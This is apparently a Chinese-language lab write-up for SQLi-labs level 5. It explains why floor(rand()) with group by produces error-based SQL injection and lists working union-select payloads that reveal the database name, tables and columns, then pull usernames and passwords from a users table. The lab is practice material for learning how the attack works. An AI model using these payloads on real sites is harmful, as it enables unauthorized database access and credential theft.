实验环境sqllabs第五关

floor()报错注入的原因是group by在向临时表插入数据时，由于rand()多次计算导致插入临时表时主键重复，从而报错，又因为报错前concat()中的SQL语句或函数被执行，所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果

因为还有一个最重要的特性，就是group by与rand()使用时，如果临时表中没有该主键，则在插入前rand()会再计算一次（也就是两次，但有些博客写的是多次，这个多次到底是几次并不知道，但是以两次来理解下面的实验都能说的通）。就是这个特性导致了主键重复并报错

上面这段话引用作者：酒仙桥六号部队

关于floor()报错注入，你真的懂了吗？ - SecPulse.COM | 安全脉搏

大家可以去看看他写的原理很详细

下面的是实验过程

id=-1' union select count(*),1,concat('~',(select database()),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+

-1' union select count(*),1,concat('~',(select concat(table_name) from information_schema.tables where table_schema=database()limit 2,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+

-1' union select count(*),1,concat('~',(select concat(table_name) from information_schema.tables where table_schema=database()limit 3,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+

-1' union select count(*),1,concat('~',(select concat(column_name) from information_schema.columns where table_name='users'limit 1,1),'~',floor(rand(0)*2)) as x from information_schema.tables group by x --+

?id=-1'union select count(*),1, concat('~',(select concat(column_name) from information_schema.columns where table_name='users' limit 2,1),'~',floor(rand()*2)) as x from information_schema.tables group by x--+

-1'union select count(*),1, concat('~',(select concat(password,username) from users limit 7,1),'~',floor(rand()*2)) as x from information_schema.tables group by x--+